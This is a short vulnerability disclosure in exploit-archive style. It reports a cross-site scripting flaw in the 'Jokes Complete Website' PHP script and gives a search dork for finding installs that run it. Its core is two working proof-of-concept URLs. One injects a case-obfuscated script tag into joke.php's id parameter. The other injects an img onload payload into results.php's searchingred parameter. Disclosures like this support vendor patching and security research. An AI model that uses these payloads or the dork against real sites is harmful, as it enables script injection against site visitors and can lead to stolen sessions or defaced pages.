Jokes Complete Website suffers from a cross site scripting vulnerability.
499e9974da7191eedaa5ef03b5ce9dbffd33b7f3e10367dfbb5351ebbc554bba
========================================================================================
| # Title : Jokes Complete Website Cross Site Scripting Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com
| # Web Site : http://www.ziddu.com/download/8197307/jokes-complete-website-php-script.rar.html
| # Dork : Powered by EasySiteNetwork
| # Script : Funny Jokes | Great Recipes | Fun Quizzes
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
1-
http://127.0.0.1/Jokes/joke.php?id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&listtype=1
http://127.0.0.1/Jokes/results.php?searchingred=<img+src=http://127.0.0.1/cars.jpg+onload=alert(213771818860)>
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Redda * Saoucha * Star08
-------------------------------------------------------------------------------------------